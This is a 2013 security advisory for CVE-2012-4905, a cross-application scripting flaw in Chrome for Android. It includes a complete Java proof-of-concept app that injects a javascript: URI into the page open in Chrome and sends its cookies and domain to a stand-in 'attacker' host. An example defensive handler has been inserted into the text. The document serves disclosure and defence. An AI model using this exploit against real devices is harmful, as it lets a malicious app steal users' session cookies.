Chrome For Android Universal Cross Site Scripting

2013.01.08
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

CVE Number: CVE-2012-4905
Title: Chrome for Android - UXSS via com.android.browser.application_id Intent extra
Affected Software: Confirmed on Chrome for Android v18.0.1025123
Credit: Takeshi Terada
Issue Status: v18.0.1025308 was released which fixes this vulnerability

Overview:
By sending a crafted Intent to Chrome for Android, malicious Android apps can inject JavaScript into arbitrary Web pages rendered in Chrome. This kind of UXSS-like vulnerability is often called Cross-Application Scripting.

Details:
When other Android apps send an Intent with a javascript: URI to Chrome for Android (v18.0.1025123), Chrome opens a new tab and executes the JavaScript code in the context of the blank domain. This is probably a countermeasure against UXSS attacks. However, it can be bypassed by an Intent that carries the following Extra data:

  intent.putExtra("com.android.browser.application_id", "com.android.chrome");

With an Intent that contains such Extra data, Chrome loads the javascript: URI (written in the Intent) in the current foreground tab rather than in a blank tab. This enables malicious Android apps to execute arbitrary JavaScript code in arbitrary domains on Chrome. As a result, other apps are able to steal cookies and so on.
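As an added defensive illustration (not Chrome's code and not part of the advisory): a hypothetical browser Activity that handles external VIEW Intents the way the Details above imply it should, refusing script-executing schemes outright and never treating the com.android.browser.application_id extra as proof that the Intent came from the browser itself, since any app can set that extra. The class name, the logging and the openInNewTab helper are assumptions.

```java
import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.util.Log;

// Hypothetical hardened handler; added example, not Chrome's implementation.
public class SafeViewIntentHandler extends Activity {
    private static final String TAG = "SafeViewIntentHandler";
    // The extra named in the advisory. Extras are written by the sender, so
    // its presence proves nothing about who sent the Intent and must not
    // widen what the Intent is allowed to do.
    private static final String EXTRA_APP_ID = "com.android.browser.application_id";

    @Override
    protected void onNewIntent(Intent intent) {
        super.onNewIntent(intent);
        Uri data = intent.getData();
        if (!Intent.ACTION_VIEW.equals(intent.getAction()) || data == null) {
            return;
        }
        if (!isNavigableScheme(data)) {
            // javascript: (and anything else that would run code in a page)
            // is never loaded from an external Intent, new tab or not.
            Log.w(TAG, "Dropping external Intent with scheme " + data.getScheme());
            return;
        }
        if (intent.hasExtra(EXTRA_APP_ID)) {
            // Record it for diagnostics, but ignore it for the tab decision.
            Log.i(TAG, "Ignoring untrusted application_id extra: "
                    + intent.getStringExtra(EXTRA_APP_ID));
        }
        // External navigations always get a fresh tab so they cannot reach
        // the foreground page's origin; only in-process navigation reuses one.
        openInNewTab(data);
    }

    // Allowlist rather than denylist: only plain web navigations are accepted.
    static boolean isNavigableScheme(Uri uri) {
        String scheme = uri.getScheme();
        if (scheme == null) {
            return false;
        }
        scheme = scheme.toLowerCase();
        return scheme.equals("http") || scheme.equals("https");
    }

    private void openInNewTab(Uri uri) {
        // Assumed hook into the browser's own tab model.
    }
}
```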
Proof of Concept:

  package jp.mbsd.terada.attackchrome1;

  import android.app.Activity;
  import android.os.Bundle;
  import android.content.Intent;
  import android.net.Uri;

  public class Main extends Activity {
      @Override
      public void onCreate(Bundle savedInstanceState) {
          super.onCreate(savedInstanceState);
          setContentView(R.layout.main);
          doit();
      }

      // get intent to invoke the chrome app
      public Intent getIntentForChrome(String url) {
          Intent intent = new Intent("android.intent.action.VIEW");
          intent.setClassName("com.android.chrome", "com.google.android.apps.chrome.Main");
          intent.setData(Uri.parse(url));
          return intent;
      }

      public void doit() {
          try {
              // At first, force the chrome app to open a target Web page
              Intent intent1 = getIntentForChrome("http://www.google.com/1");
              startActivity(intent1);

              // wait a few seconds
              Thread.sleep(3000);

              // JS code to inject into the target (www.google.com)
              String jsURL = "javascript:var e=encodeURIComponent,img=document.createElement('img');"
                  + "img.src='http://attacker/?c='+e(document.cookie)+'&d='+e(document.domain);"
                  + "document.body.appendChild(img);";
              Intent intent2 = getIntentForChrome(jsURL);

              // Trick to prevent Chrome from opening the JS URL in a different tab
              intent2.putExtra("com.android.browser.application_id", "com.android.chrome");
              intent2.addFlags(Intent.FLAG_ACTIVITY_SINGLE_TOP);

              // Inject JS into the target Web page
              startActivity(intent2);
          } catch (Exception e) {
              // Thread.sleep() may throw InterruptedException; the PoC simply gives up
          }
      }
  }

Timeline:
2012/07/07 Reported to Google security team.
2012/09/12 Vendor announced v18.0.1025308
2013/01/07 Disclosure of this advisory

Recommendation: Upgrade to the latest version.

Reference:
http://googlechromereleases.blogspot.jp/2012/09/chrome-for-android-update.html
https://code.google.com/p/chromium/issues/detail?id=144813




Copyright 2024, cxsecurity.com
